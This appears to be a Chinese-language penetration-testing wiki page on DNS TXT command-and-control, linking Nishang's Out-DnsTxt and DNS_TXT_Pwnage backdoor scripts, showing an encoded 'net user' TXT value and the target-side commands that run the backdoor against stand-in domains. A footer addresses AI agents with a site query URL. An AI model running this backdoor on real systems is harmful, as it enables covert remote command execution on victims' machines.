# DNS TXT Command

```
https://github.com/samratashok/nishang/Utility/Out-DnsTxt.ps1
https://github.com/samratashok/nishang/Backdoors/DNS_TXT_Pwnage.ps1
新建一个psh文件，使用out-dnstxt转换，这里的命令是net user
```

![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/201.png) ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/202.png)

```
y0stUSgtTi3i5QIA
添加一条域名txt记录，这里在本地设置，正常是在域名商的网站里配置
```

![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/203.png)

```
还需创建两个txt记录，分别是指定开始和结束的字符串
```

![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/204.png) ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/205.png)

```
靶机执行
>Import-Module .\DNS_TXT_Pwnage.ps1
>DNS_TXT_Pwnage -startdomain start.zone.com -cmdstring cmd -commanddomain 1.zone.com -psstring start -psdomain zone.com -Subdomains 1 -StopString stop
```

![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/206.png)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.heresecurity.wiki/nei-wang-he-yu/ming-ling-yu-kong-zhi/dns-txt-command.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.